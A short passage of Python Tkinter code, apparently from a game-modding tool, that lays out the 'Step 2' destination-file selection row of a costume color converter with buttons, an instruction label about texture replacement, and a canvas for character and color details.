ttk.Label(cccFileSelectionRow, text='Step 2 | Choose a "destination" file of the desired color (and same character). This file will have its texture data replaced with the textures ' \
"from the file above.\nSo make sure you have a back-up of this if you'd like to use it again later.", wraplength=350).grid(column=0, row=1, padx=15, pady=25)
cccTabRow4RightCell = Tk.Frame(cccFileSelectionRow)
ttk.Button( cccTabRow4RightCell, text=' Within a Disc ', command=cccPointToDiscTab ).grid( column=0, row=0 )
ttk.Button( cccTabRow4RightCell, text=' Standalone File ', command=lambda: cccSelectStandalone('dest') ).grid( column=1, row=0 )
self.cccDestCanvas = Tk.Canvas( cccTabRow4RightCell, width=290, height=64, borderwidth=0, highlightthickness=0 ) #, background='blue'
self.cccDestCanvas.create_text( self.cccIdentifiersXPos, 20, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Character: ' )
self.cccDestCanvas.create_text( self.cccIdentifiersXPos, 44, anchor='w', font="-weight bold -size 10", fill=self.globalFontColor, text='Costume Color: ' )